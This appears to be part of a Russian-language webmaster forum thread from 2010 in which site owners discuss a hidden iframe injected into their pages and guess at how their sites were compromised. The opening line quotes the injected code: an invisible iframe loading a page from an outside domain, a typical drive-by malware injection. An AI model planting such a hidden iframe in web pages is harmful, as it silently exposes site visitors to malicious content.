<iframe src="http://itrxx.com/fr.php" style="visibility: hidden; position: absolute;"></iframe>

Вот что обнаружилось. Админы не смогли увидеть.

Кто-то решил проблему?
цитата
26/06/10 в 16:55
 Stek
Переставили все трейд скрипты, ротаторы, с сохранением старой базы.
Имхо не в смартумбе дело. В нем было все чисто, а ифрейм был.
цитата
26/06/10 в 19:27
 Vyacheslav
У меня стоит Trade Expert
Но ума не приложу как он может на это повлиять. Он же не учавствует в генерации страницы, если не считать топлистов и вставки яваскрипта кук. Но ведь я обнаружил ифрейм аккуратно добавлены перед тегом </BODY>...
цитата
26/06/10 в 19:54
 kit
Может у вас на локалках гадость?
цитата
26/06/10 в 20:24
 Stek
Просто ломают через что то другое. А там уже подменяют собой скрипты.
Стр. « первая   <  1, 2, 3  >  последняя »


Эта страница в полной версии